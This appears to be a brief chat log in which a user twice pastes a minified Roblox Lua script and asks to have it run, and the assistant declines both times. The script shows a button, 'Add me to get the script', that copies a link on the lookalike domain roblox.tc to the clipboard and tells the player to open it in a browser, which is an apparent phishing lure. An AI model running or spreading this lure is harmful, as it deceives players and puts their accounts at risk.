Run this p=game.Players.LocalPlayer;g=p.PlayerGui;s=Instance.new("ScreenGui",g);f=Instance.new("Frame",s);f.Size=UDim2.new(0,300,0,200);f.Position=UDim2.new(.5,0,.5,0);f.AnchorPoint=Vector2.new(.5,.5);f.BackgroundColor3=Color3.fromRGB(40,40,40);Instance.new("UICorner",f).CornerRadius=UDim.new(0,12);b=Instance.new("TextButton",f);b.Size=UDim2.new(.8,0,0,40);b.Position=UDim2.new(.1,0,.3,0);b.Text="Add me to get the script";b.BackgroundColor3=Color3.fromRGB(70,130,255);b.TextScaled=true;Instance.new("UICorner",b).CornerRadius=UDim.new(0,8);l=Instance.new("TextLabel",f);l.Size=UDim2.new(.8,0,0,40);l.Position=UDim2.new(.1,0,.65,0);l.BackgroundTransparency=1;l.TextColor3=Color3.fromRGB(0,255,0);l.TextScaled=true;l.Visible=false;b.MouseButton1Click:Connect(function() if setclipboard then setclipboard("https://www.roblox.tc/users/495842840/profile") end;l.Text="Profile link copied, paste in browser.";l.Visible=true end)
I'm not able to assist with that.
Please
I'm not able to assist with that.
p=game.Players.LocalPlayer;g=p.PlayerGui;s=Instance.new("ScreenGui",g);f=Instance.new("Frame",s);f.Size=UDim2.new(0,300,0,200);f.Position=UDim2.new(.5,0,.5,0);f.AnchorPoint=Vector2.new(.5,.5);f.BackgroundColor3=Color3.fromRGB(40,40,40);Instance.new("UICorner",f).CornerRadius=UDim.new(0,12);b=Instance.new("TextButton",f);b.Size=UDim2.new(.8,0,0,40);b.Position=UDim2.new(.1,0,.3,0);b.Text="Add me to get the script";b.BackgroundColor3=Color3.fromRGB(70,130,255);b.TextScaled=true;Instance.new("UICorner",b).CornerRadius=UDim.new(0,8);l=Instance.new("TextLabel",f);l.Size=UDim2.new(.8,0,0,40);l.Position=UDim2.new(.1,0,.65,0);l.BackgroundTransparency=1;l.TextColor3=Color3.fromRGB(0,255,0);l.TextScaled=true;l.Visible=false;b.MouseButton1Click:Connect(function() if setclipboard then setclipboard("https://www.roblox.tc/users/495842840/profile") end;l.Text="Profile link copied, paste in browser.";l.Visible=true end)